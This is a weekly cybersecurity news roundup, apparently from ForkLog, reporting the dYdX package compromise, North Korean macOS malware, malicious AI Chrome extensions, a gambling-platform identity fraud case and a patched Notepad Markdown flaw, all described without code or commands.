We’ve compiled the most significant cybersecurity news from the past week.

  • Hackers compromised the accounts of developers at the cryptocurrency exchange dYdX.
  • North Korean hackers employed new malware for macOS to steal cryptocurrency.
  • Malicious AI extensions for Chrome were installed by 300,000 users.
  • Two residents of Connecticut were charged with stealing $3 million.

Hackers Compromise dYdX Developers' Accounts

Malicious actors hacked the accounts of developers at the decentralized cryptocurrency exchange dYdX and injected malware into official software packages (npm and PyPI). The breach was discovered by Socket specialists.

The npm and PyPI packages are used by programmers to interact with the exchange's protocols, including wallet creation and transaction processing. Given that billions of dollars flow through dYdX, the scale of the threat is extremely high.

The attack targeted cryptocurrency wallet seed phrases. Once a developer interacted with the infected library, the malware copied access keys and sent them to the hackers' server. The attackers used website addresses that closely resembled the official exchange domains.

For developers using the Python version of the software, the situation was even worse: a remote access Trojan was installed on their systems. The malware activated in the background every 10 seconds, allowing hackers to execute any code on the victim's computer. This enabled them to steal not only cryptocurrency but also passwords, personal files, and monitor user activities.

Socket specialists noted that the hackers understood the internal structure of the system. They concealed the malicious code deep within legitimate files that run automatically.

After being alerted by experts, the exchange confirmed the breach and urged anyone who downloaded updates in January 2026 to immediately isolate their computers and transfer funds to new secure wallets.

1/ IMPORTANT SECURITY ANNOUNCEMENT — READ IF YOU HAVE USED VERSIONS OF DYDX-V4 CLIENTS HOSTED ON PyPI or NPM.

— dYdX (@dYdX) January 29, 2026

North Korean Hackers Use New macOS Malware to Steal Cryptocurrency

North Korean hackers are conducting targeted campaigns using AI-generated videos to deliver malware to cryptocurrency users. This was reported by Mandiant experts.

The attackers aim for financial gain, as indicated by the toolkit used in the attack on an unnamed fintech company. According to Mandiant, researchers discovered seven different families of macOS malware and attributed them to the UNC1069 group, which they have been monitoring since 2018.

The hackers contacted the victim via Telegram from a compromised account of a cryptocurrency company executive. After establishing trust, they sent a link to Calendly, which redirected the victim to a fake Zoom conference page hosted on the attackers' infrastructure.

The victim reported that the hackers showed a deepfake video of the cryptocurrency company's CEO. During the video call, the attacker simulated sound issues, using this pretext to instruct the victim on how to "fix errors" by executing commands that initiated a malware chain for both Windows and macOS.

Subsequently, the hackers deployed seven different families of malware:

  • WAVESHAPER — a backdoor that operates as a background service, collects system information, and downloads subsequent modules;
  • HYPERCALL — a loader for downloading malicious dynamic libraries directly into memory;
  • HIDDENCALL — a backdoor providing hackers direct access to the keyboard, command execution, and file operations;
  • SILENCELIFT — a minimalist backdoor that reports screen lock status to the hackers' server and can intercept messages in Telegram with root access;
  • DEEPBREATH — a data theft tool that bypasses macOS protections, stealing contents from the digital keychain, browser data, Telegram, and Apple Notes;
  • SUGARLOADER — a loader that uses encrypted configuration to obtain payloads for subsequent stages;
  • CHROMEPUSH — a browser data mining tool disguised as an "Offline Google Docs" extension that intercepts keystrokes, cookies, and takes screenshots.

Mandiant noted that the SILENCELIFT, DEEPBREATH, and CHROMEPUSH families represent a completely new toolkit for the group. Researchers described the volume of malware deployed on a single host against one individual as "unusual."

This confirms that the attack was highly specialized and aimed at gathering maximum data for two purposes: stealing cryptocurrency and preparing for future campaigns by stealing the victim's identity and contacts.

Malicious AI Chrome Extensions Installed by 300,000 Users

Thirty malicious AI extensions for Chrome were installed by over 260,000 users. This was reported by LayerX browser security researchers.

The discovered campaign masquerades as AI assistants with the goal of stealing credentials, email content, and information about visited pages.

All analyzed extensions are part of a single fraudulent network, as they connect to infrastructure on a single domain.

According to researchers, the most popular extension in the campaign was Gemini AI Sidebar (80,000 users), which has already been removed from the store. However, BleepingComputer found that other extensions with thousands of installations are still present in the Google repository:

  • AI Sidebar — 70,000 users;
  • AI Assistant — 60,000 users;
  • ChatGPT Translate — 30,000 users;
  • AI GPT — 20,000 users;
  • ChatGPT — 20,000 users;
  • Google Gemini — 10,000 users.

All 30 extensions share the same internal structure, JavaScript logic, and requested permissions. They do not contain AI functions within the code. Instead, they load content from a remote domain.

What is particularly dangerous is that developers can change the logic of the extension at any time on the server side without releasing an update. This approach allows them to bypass re-verification by Google moderators.

In the background, the extensions extract content from visited pages, including sensitive login pages:

  • Gmail tracking. Fifteen extensions specifically target Google Mail data. The script reads email text directly from the browser and can even intercept drafts;
  • Data leakage. When using features like "AI response generation," the email text is sent to the attackers' external servers, leaving the secure Gmail perimeter;
  • Surveillance. The software also has a voice recognition feature that can be activated remotely. Depending on permissions, it can record user conversations.

BleepingComputer reached out to Google for comments, but the corporation had not responded by the time of publication. Experts recommended checking LayerX's list of breach indicators, immediately removing the extension, and changing passwords.

Connecticut Residents Charged with Stealing $3 Million

Two Connecticut residents have been charged with fraud involving gambling platforms and stolen personal data. This was reported by the U.S. Department of Justice.

According to the indictment, from April 2021 to 2026, the accomplices stole $3 million using the stolen personal information of approximately 3,000 victims.

The scammers operated according to the following algorithm:

  • Data purchase. They acquired personal information of thousands of people on dark web markets and through the Telegram messenger;
  • Account creation: Using the data, they opened thousands of fake accounts on platforms like FanDuel, DraftKings, and BetMGM;
  • Data verification. The accused subscribed to background check services (TruthFinder, BeenVerified) to answer security questions during account verification;
  • Automation. One of the suspects maintained a spreadsheet containing names, birth dates, addresses, emails, and Social Security numbers of the victims.

"I was just browsing the list of Social Security numbers and used reverse phone lookup in the Scam Shield app," wrote accused Amitoy Kapoor in a text message to accomplice Siddharth Lillani.

When matches were found, the scammer created an account. In some cases, additional verification by BeenVerified was unnecessary.

The goal of the scheme was to obtain promotional bonuses offered by bookmakers for first deposits or bets. If such a bet won, the accused transferred the funds to prepaid virtual cards and then to their personal accounts.

Microsoft Fixes Remote Code Execution in Windows 11 Notepad

Microsoft patched a critical vulnerability in the Notepad application for Windows 11 that allowed hackers to execute local or remote programs. To exploit this, attackers only needed to trick the user into clicking on a specially crafted Markdown link, reports BleepingComputer.

With the release of Windows 11, Microsoft decided to retire WordPad and modernize Notepad. It was rewritten from scratch to add Markdown support, allowing users to format text and insert clickable links directly into text files (.md).

According to reports, the issue stemmed from improper handling of special elements in commands. A hacker could create a Markdown file with malicious links using protocols like file:// (path to an executable file) or ms-appinstaller:// (application installation).

When opened in earlier versions of Notepad (including 11.2510) in Markdown mode, the text displayed as a link. After clicking it with Ctrl+click, the software would automatically execute the specified file or protocol. The main danger was that the code executed in the user's safe environment with the same access rights, and Windows did not display the standard warning about launching potentially dangerous files.

Security researchers found that links could even be created to files located on remote network resources. After the patch was released, attempting to click on any other link in Notepad prompts a warning dialog.

Also on ForkLog:

  • Mass delistings strengthened Monero's monopoly in the dark web.
  • The winner of the X competition for $1 million was suspected of multiple rug pulls.
  • Eight years in prison and a $7.5 million payout: a court sentenced the former head of SafeMoon.
  • Experts assessed the new rules for cryptocurrency seizure in Russia.
  • The founder of FTX accused the Biden administration of political persecution.
  • In South Korea, an investigation was launched against Bithumb after a "giveaway" of bitcoins.
  • Tether froze $544 million in illegal funds at Turkey's request.

What to Read This Weekend?

In a new piece, ForkLog, along with the team from the Bitcoin mixer Mixer.Money, explores the consequences of data leaks and what can be done to minimize risks.